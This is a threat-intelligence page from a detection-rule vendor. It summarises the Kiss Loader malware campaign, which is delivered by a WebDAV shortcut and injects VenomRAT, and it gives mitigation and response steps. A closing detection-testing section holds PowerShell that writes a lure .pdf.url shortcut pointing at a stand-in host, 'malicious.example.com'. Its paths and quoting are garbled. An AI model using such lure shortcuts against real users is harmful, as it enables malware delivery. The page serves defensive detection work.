SOC Prime Bias: Medium

26 Mar 2026 15:43
newspaper icon gdatasoftware.com

When Malware Talks Back: Real-Time Interaction with a Threat Actor During the Analysis of Kiss Loader

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
When Malware Talks Back: Real-Time Interaction with a Threat Actor During the Analysis of Kiss Loader
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The article examines a newly identified loader named Kiss Loader, distributed through a Windows shortcut that points to a WebDAV repository exposed via a TryCloudflare tunnel. Once launched, the loader decrypts Donut-generated shellcode, retrieves payloads such as VenomRAT and a Kryptik component, and executes them through Early Bird APC injection into explorer.exe. During analysis, the researcher experienced direct interaction with the malware operator through a Notepad window, which confirmed use of the Early Bird injection method. The case underscores the tool’s rapid evolution and the need for strong containment when handling active malware.

Investigation

Researchers detonated the initial shortcut in a controlled lab and traced the execution chain through a WSH script, JScript component, batch files, and a Python-based loader. They confirmed the use of Donut-generated shellcode, extracted the embedded payloads, and documented the final injection method, which queues an APC into a suspended explorer.exe process. Throughout the session, the team captured detailed runtime output and developer messages left inside the malware flow. A short real-time exchange with the operator further confirmed both the technique and the loader’s active development state.

Mitigation

Organizations should restrict or inspect WebDAV traffic delivered through public tunneling platforms such as TryCloudflare, disable automatic execution of .url shortcut files, and apply strict execution controls to scripts and batch files in user-accessible startup paths. Endpoint defenses should detect Early Bird APC injection behavior and watch for suspended processes receiving queued APCs. Application allowlists should also be kept current to block unknown Python loaders and Donut-based shellcode.

Response

If Kiss Loader activity is detected, isolate the endpoint immediately, terminate any suspicious explorer.exe processes started in a suspended state, and capture memory for forensic review. Investigators should identify and block the related WebDAV infrastructure, scan the host for VenomRAT, Kryptik, and any additional dropped payloads, and rotate potentially exposed credentials. Logging should then be reviewed for other intrusion attempts, and detection rules should be updated with all newly observed indicators.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An attacker with limited access to the victim workstation wants to establish a foothold for lateral movement. They craft a malicious Windows Internet Shortcut named DKM_DE000922.pdf.url that points to a malicious WebDAV share (http://malicious.example.com/webdav/evil.pdf). When a user double‑clicks the shortcut, the system automatically attempts to mount the WebDAV resource, causing the victim to download the payload without executing a traditional binary. The creation of this shortcut generates a file‑creation event that matches the detection rule.

    ```powershell
# Path where the shortcut will be dropped (e.g., user's Desktop)
$maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"

# Content of the malicious .url file pointing to a WebDAV share
$maliciousContent = @"
    [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

    # Write the file – this action should trigger the detection rule
Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII
```

  • Regression Test Script: The script below reproduces the exact steps needed to generate the detection‑triggering telemetry.

    ```powershell
# ---------------------------------------------------------
# Regression Test – Trigger Sigma rule for WebDAV .url files
# ---------------------------------------------------------

# 1. Define target location (desktop for current user)
$targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"

# 2. Build malicious shortcut content
$urlPayload = @"
    [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

    # 3. Write the shortcut (this will fire a FileCreate event)
Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII

Write-Host "Malicious .url shortcut created at $targetFile"
```

  • Cleanup Commands: Remove the malicious shortcut after verification.

    ```powershell
$maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
if (Test-Path $maliciousPath) {
    Remove-Item -Path $maliciousPath -Force
    Write-Host "Cleaned up malicious shortcut."
} else {
    Write-Host "No malicious shortcut found; nothing to clean."
}
```

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free